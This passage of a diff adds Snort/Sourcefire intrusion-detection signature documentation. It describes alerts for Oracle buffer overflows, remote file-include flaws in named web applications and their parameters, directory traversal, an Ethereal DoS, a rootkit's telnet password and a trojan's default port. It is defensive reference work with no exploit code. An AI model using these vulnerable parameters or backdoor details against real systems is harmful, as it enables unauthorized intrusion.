+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2887.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2887
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_delete_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/881.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+881
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Guide to network resource tools:
+http://www.acad.bg/beginner/gnrt/specialist/archie.html
+
+--
--- /dev/null
+++ b/doc/signatures/993.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 993
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2629.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2629
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "register_user_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "privilege_type" variable
+to cause the overflow. The result could permit the attacker to gain
+escalated privileges and run code of their choosing. This attack
+requires an attacker to logon to the database with a valid username
+and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck94.html
+
+--
--- /dev/null
+++ b/doc/signatures/313.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 313
+
+--
+Summary:
+This event is generated when an attempt to exploit a buffer overflow condition in ntalkd is made.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to gain remote access to the victim host or execute arbitrary code with the privileges of the superuser account.
+
+--
+Detailed Information:
+Some versions of the Network Talk Daemon (ntalkd) are vulnerable to a buffer overflow condition which can present the attacker with a root shell.
+
+Talk is used to communicate between users of UNIX based operating systems. A vulnerability exists such that a buffer overflow condition in talk can be exploited by a malicious user. This may then present the attacker with the opportunity to gain root access to the target system.
+
+Affected Versions:
+	Multiple vendors
+
+--
+Attack Scenarios:
+Once the overflow has been created, the attacker is able to supply incorrect hostname information to the target system and gain root access.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/210
+
+--
--- /dev/null
+++ b/doc/signatures/100000847.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000847
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Sitemap" application running on a webserver. Access to the file "sitemap.xml.php" using a remote file being passed as the "mosConfig_absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mosConfig_absolute_path" parameter in the "sitemap.xml.php" script used by the "Sitemap" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Sitemap
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000677.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000677
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "topics.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "topics.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1052.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1052
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2214.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2214
+
+--
+Summary:
+This event is generated when an attempt is made to access mailview.cgi on an internal web server. This may indicate an attempt to exploit a directory traversal vulnerability in MailStudio 2000 2.0 and earlier.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+MailStudio 2000 is mail server software for Solaris or Linux operating systems. It contains a vulnerability where data sent to mailview.cgi is not properly parsed. This can allow an attacker to use directory traversal techniques (/../) within the "html" parameter to view arbitrary files on the system, including other users' email, configuration files, and password files.
+
+--
+Affected Systems:
+Systems running MailStudio 2000 2.0 and earlier.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to a vulnerable web server with another user's email file as the html argument. The attacker will then be able to view the file.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses mailview.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been fixed. Contact the vendor, 3R Soft (http://www.3rsoft.com), for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/1335
+
+--
--- /dev/null
+++ b/doc/signatures/3053.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3053
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2698.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+2698
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create file.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/686.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000174.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000174
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in RSA Security RSA Authentication Agent For Web.
+
+-- 
+Impact: 
+Cross site scripting leading to possible inclusion of code of the attackers 
+choosing.
+
+--
+Detailed Information:
+A vulnerability exists in RSA Security RSA Authentication Agent For Web that 
+may allow an attacker to include code of their choosing due to the improper 
+checking of user supplied input.
+
+--
+Affected Systems:
+RSA Security RSA Authentication Agent For Web 5.2
+
+--
+Attack Scenarios: 
+An attacker can supply a link to include code of their choosing in data 
+supplied to RSA Security RSA Authentication Agent For Web.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000740.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000740
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "Import.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "Import.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000596.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000596
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_config_payment.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"inv_config_payment.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/220.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+220
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "wank". This is a known password for 
+the HideSource rootkit.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2069.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2069
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in devices using the IPC@CHIP from Beck IPC GmbH.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+The IPC@CHIP from Beck IPC GmbH is used in network appliances for use in
+controlling those devices via a web interface.
+
+The embedded webserver uses the system root as its default webserver 
+root directory. This means an attacker can request any file on the 
+system by making an http request for the file.
+
+--
+Affected Systems:
+All devices using this chip.
+
+--
+Attack Scenarios:
+The attacker needs to craft a special URI including chip.ini with a 
+request for a file on the system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Network devices using this chip should be closely monitored, access to 
+the embedded webserver should be carefully controlled using a firewall 
+or disabled where possible.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2775
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0749
+
+--
--- /dev/null
+++ b/doc/signatures/3011.txt
@@ -0,0 +1,73 @@
+Rule: 
+
+--
+Sid: 
+3011
+-- 
+Summary: 
+This event is generated when an attempt is made to find the System
+directory on a target host with the RUX the Tick Trojan.
+
+-- 
+Impact: 
+If successful, the attacker would gain unauthorized access to the system,
+to upload and execute file on the target system. The attacker can use
+this function to upload additional backdoors to the victim's system and
+execute them.
+
+--
+Detailed Information:
+When executed, RUX the Tick opens up its assigned port (default is
+22222) for communication with the attacker. RUX the Tick has three
+functions: Get Windows Directory, Get System Directory, and Upload And
+Execute File. Get Windows Directory and Get System Directory are used
+for reconnaissance. Upload And Execute File is mainly used to upload and
+run other backdoors onto the victim's computer.
+
+--
+Affected Systems:
+	Windows 95/98/ME/NT/2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files
+because they often can be backdoors in disguise. Once the victim
+mistakenly installs the server program, the attacker usually will employ
+an IP scanner program to find the IP addresses of victims that have
+installed the program. Then the attacker enters the IP address, port
+number (which  is assigned to the server program by the attacker:
+default is 22222), and presses the connect button and he has access to
+the computer.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action: 
+Using Windows Task Manager, kill these processes: ruxserver.exe and server.exe.
+Use Windows Explorer to find ruxserver.exe and delete the file.
+
+Keep anti-virus programs updated with the latest definitions.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com>
+
+-- 
+Additional References:
+
+PestPatrol:
+http://www.pestpatrol.com/PestInfo/R/RUX.ASP
+
+--
--- /dev/null
+++ b/doc/signatures/1716.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1716
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1400.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1400
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1967.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1967
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
